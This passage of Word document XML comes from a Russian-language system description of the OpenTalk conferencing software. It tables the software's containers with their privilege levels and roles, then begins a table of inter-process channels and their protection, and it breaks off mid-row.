          <w:p w14:paraId="26B8C52B" w14:textId="77777777" w:rsidR="005E340B" w:rsidRPr="00C82B97" w:rsidRDefault="005E340B" w:rsidP="00D06AFE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№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1970C443" w14:textId="77777777" w:rsidR="005E340B" w:rsidRPr="00C82B97" w:rsidRDefault="005E340B" w:rsidP="00D06AFE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Название процесса</w:t>
            </w:r>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>службы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1625F650" w14:textId="77777777" w:rsidR="005E340B" w:rsidRPr="00C82B97" w:rsidRDefault="005E340B" w:rsidP="00D06AFE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Уровень привилегий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496728D6" w14:textId="77777777" w:rsidR="005E340B" w:rsidRPr="00C82B97" w:rsidRDefault="005E340B" w:rsidP="00D06AFE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Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E340B" w14:paraId="59D909EF" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AFC08D9" w14:textId="77777777" w:rsidR="005E340B" w:rsidRDefault="005E340B" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41EC4B77" w14:textId="0E929940" w:rsidR="005E340B" w:rsidRPr="00B32389" w:rsidRDefault="003A5828" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Nginx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29F2FDF7" w14:textId="7A15A6EA" w:rsidR="005E340B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Root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2117FDE2" w14:textId="6196C84A" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30737EED" w14:textId="696ED7BF" w:rsidR="005E340B" w:rsidRPr="00B32389" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>Обратный прокси-сервер, точка входа в систему.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="6ADDE67E" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13CB06D7" w14:textId="20819599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9" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ED21AC7" w14:textId="0E191867" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk-web-frontend-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D5A38BC" w14:textId="4F7322CB" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E202C">
              <w:t>on-root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="593F4243" w14:textId="151C8D78" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>Веб-сервер</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="46FB0066" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="712AA2A4" w14:textId="2654D132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9" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BAE6086" w14:textId="2EC1BAD6" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk-controller-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB99A5F" w14:textId="0E294D1A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Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A63EFFF" w14:textId="12C7A43E" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>обработка REST-запросов, работа с правами, комнатами, координация контейнеров</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="7984D755" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67A75056" w14:textId="1EEA3100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9" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18C1EB81" w14:textId="299BAD70" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E202C">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>k</w:t>
            </w:r>
            <w:r w:rsidR="001F04CB">
              <w:t>eycloak</w:t>
            </w:r>
            <w:r w:rsidRPr="001E202C">
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62747BCB" w14:textId="6E963A2B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Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29BE02F9" w14:textId="53B6B958" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>Управление идентификацией и доступом</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="15057F95" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CB8DA85" w14:textId="19668B91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9" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA3F4B0" w14:textId="7AC97935" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk-</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:t>LiveKit</w:t>
            </w:r>
            <w:r w:rsidRPr="001E202C">
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EEECBA5" w14:textId="56122B02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Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A074C43" w14:textId="706E3388" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>Медиасервер</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="644B13A0" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51426740" w14:textId="0E0506DB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19" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B7FEF1E" w14:textId="6AD848B6" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk-postgres-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76054F2D" w14:textId="7360F071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Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44BB6629" w14:textId="62ADFB7A" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>БД контроллера</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="5E69C2A2" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="021044E9" w14:textId="71E4B67A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3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45305C76" w14:textId="0BF8F11C" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk-postgres-kc-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B57EF16" w14:textId="4FF9E305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Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="277C1621" w14:textId="5EBC1C45" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t xml:space="preserve">БД </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="20BDC7B7" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1659DBD0" w14:textId="6E396BFD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19" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10527C0E" w14:textId="020352CA" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk-minio-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="476DCF1F" w14:textId="1A9C56BB" w:rsidR="001E202C" w:rsidRPr="003A5828" w:rsidRDefault="003A5828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Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AAFAE47" w14:textId="22C831C6" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>Объектное хранилище, доступ по протоколу S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="46B5E39E" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549C315B" w14:textId="2BF0CAEA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19" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="071E5823" w14:textId="32EFEA86" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk-</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:t>Rabbit</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:t>MQ</w:t>
            </w:r>
            <w:r w:rsidRPr="001E202C">
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3227F5A8" w14:textId="391CDDE3" w:rsidR="001E202C" w:rsidRPr="003A5828" w:rsidRDefault="003A5828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Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4207F7B0" w14:textId="3D8944F5" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Распределитель </w:t>
            </w:r>
            <w:r w:rsidRPr="001E202C">
              <w:t>очереди задач</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E202C" w14:paraId="732229ED" w14:textId="77777777" w:rsidTr="00D06AFE">
        <w:trPr>
          <w:trHeight w:val="1288"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21955710" w14:textId="0E9CAAE5" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7939BD94" w14:textId="3CF5783D" w:rsidR="001E202C" w:rsidRPr="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>opentalk-autoheal-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="372ABC85" w14:textId="551DCBBA" w:rsidR="001E202C" w:rsidRPr="003A5828" w:rsidRDefault="003A5828" w:rsidP="00D06AFE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Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D8F0790" w14:textId="2830E8A6" w:rsidR="001E202C" w:rsidRDefault="001E202C" w:rsidP="00D06AFE">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001E202C">
              <w:t>Отслеживает состояние контейнеров</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6292D50D" w14:textId="6E5F41CB" w:rsidR="00EC7AA4" w:rsidRPr="00A75A45" w:rsidRDefault="00EC7AA4" w:rsidP="00EC7AA4">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E72341F" w14:textId="50D25654" w:rsidR="005927B6" w:rsidRPr="005927B6" w:rsidRDefault="00495F80" w:rsidP="005927B6">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r>
        <w:t>Все к</w:t>
      </w:r>
      <w:r w:rsidRPr="005927B6">
        <w:t>омпоненты,</w:t>
      </w:r>
      <w:r w:rsidR="005927B6" w:rsidRPr="005927B6">
        <w:t xml:space="preserve"> взаимодействую</w:t>
      </w:r>
      <w:r>
        <w:t>щие</w:t>
      </w:r>
      <w:r w:rsidR="005927B6" w:rsidRPr="005927B6">
        <w:t xml:space="preserve"> по сети внутри </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005927B6" w:rsidRPr="005927B6">
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495F80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">представлены в </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref234278236 \r \h \</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>таблице</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005927B6" w:rsidRPr="005927B6">
        <w:t xml:space="preserve">Внешний трафик проходит через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005927B6" w:rsidRPr="005927B6">
        <w:t xml:space="preserve"> по HTTPS</w:t>
      </w:r>
      <w:r w:rsidR="003A5828" w:rsidRPr="003A5828">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005927B6" w:rsidRPr="005927B6">
        <w:t xml:space="preserve"> внутренний трафик между сервисами идёт по незашифрованному HTTP, так как находится в пределах границы доверия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B354F1" w14:textId="77777777" w:rsidR="005927B6" w:rsidRPr="005927B6" w:rsidRDefault="005927B6" w:rsidP="00EC7AA4">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36042C10" w14:textId="3B08BDBB" w:rsidR="00EC7AA4" w:rsidRPr="005508D7" w:rsidRDefault="00EC7AA4" w:rsidP="001074BB">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Ref213857730"/>
      <w:bookmarkStart w:id="5" w:name="_Ref234278236"/>
      <w:r w:rsidRPr="001074BB">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="005508D7">
        <w:t xml:space="preserve">Механизмы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005508D7">
        <w:t>межпроцессного</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005508D7">
        <w:t xml:space="preserve"> взаимодействия</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="005508D7">
        <w:t xml:space="preserve"> ПО </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="006B5B72">
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B5B72">
        <w:t>»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1783"/>
        <w:gridCol w:w="1869"/>
        <w:gridCol w:w="1869"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC7AA4" w14:paraId="25717839" w14:textId="77777777" w:rsidTr="006B5B72">
        <w:trPr>
          <w:trHeight w:val="2539"/>
          <w:tblHeader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B4192" w14:textId="77777777" w:rsidR="00EC7AA4" w:rsidRPr="00C82B97" w:rsidRDefault="00EC7AA4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№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5D20" w14:textId="77777777" w:rsidR="00EC7AA4" w:rsidRPr="00C82B97" w:rsidRDefault="00EC7AA4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Механизм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45B5C" w14:textId="77777777" w:rsidR="00EC7AA4" w:rsidRPr="00C82B97" w:rsidRDefault="00EC7AA4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Назначение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19DE1" w14:textId="77777777" w:rsidR="00EC7AA4" w:rsidRPr="00C82B97" w:rsidRDefault="00EC7AA4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Защита канала передачи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2A930" w14:textId="77777777" w:rsidR="00EC7AA4" w:rsidRPr="00C82B97" w:rsidRDefault="00EC7AA4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Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC7AA4" w14:paraId="5E9E1F6C" w14:textId="77777777" w:rsidTr="006B5B72">
        <w:trPr>
          <w:trHeight w:val="2539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DD7C2" w14:textId="77777777" w:rsidR="00EC7AA4" w:rsidRDefault="00EC7AA4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>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72B1D" w14:textId="47F6BCE3" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00495F80">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="005927B6">
              <w:t xml:space="preserve">Браузер – </w:t>
            </w:r>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
            <w:r w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CEAF808" w14:textId="39FDB1FB" w:rsidR="00EC7AA4" w:rsidRPr="001211A6" w:rsidRDefault="005927B6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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A1A7A" w14:textId="4A949A6A" w:rsidR="00EC7AA4" w:rsidRPr="005927B6" w:rsidRDefault="005927B6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Доступ к системе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6B6C6" w14:textId="2B45CC39" w:rsidR="00EC7AA4" w:rsidRPr="005927B6" w:rsidRDefault="005927B6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TLS, </w:t>
            </w:r>
            <w:r>
              <w:t>Сертификаты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EBEE5" w14:textId="0623AFA2" w:rsidR="00EC7AA4" w:rsidRDefault="005927B6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="005927B6">
              <w:t>Внешн</w:t>
            </w:r>
            <w:r>
              <w:t>яя сеть</w:t>
            </w:r>
            <w:r w:rsidRPr="005927B6">
              <w:t xml:space="preserve">. Единственный </w:t>
            </w:r>
            <w:r>
              <w:t>зашифрованный</w:t>
            </w:r>
            <w:r w:rsidRPr="005927B6">
              <w:t xml:space="preserve"> вход. Основная поверхность атаки.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005927B6" w14:paraId="58E039BE" w14:textId="77777777" w:rsidTr="006B5B72">
        <w:trPr>
          <w:trHeight w:val="2539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7B621" w14:textId="732E4DBC" w:rsidR="005927B6" w:rsidRDefault="005927B6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>2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5E77" w14:textId="66A612C4" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="001211A6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00495F80">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
            <w:r w:rsidR="00D85D3B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>контейнеры</w:t>
            </w:r>
            <w:r w:rsidR="00FB3626">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE30AF2" w14:textId="22F9C915" w:rsidR="005927B6" w:rsidRPr="00FB3626" w:rsidRDefault="005927B6">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US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C286" w14:textId="4FB93FCB" w:rsidR="005927B6" w:rsidRDefault="00D85D3B">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
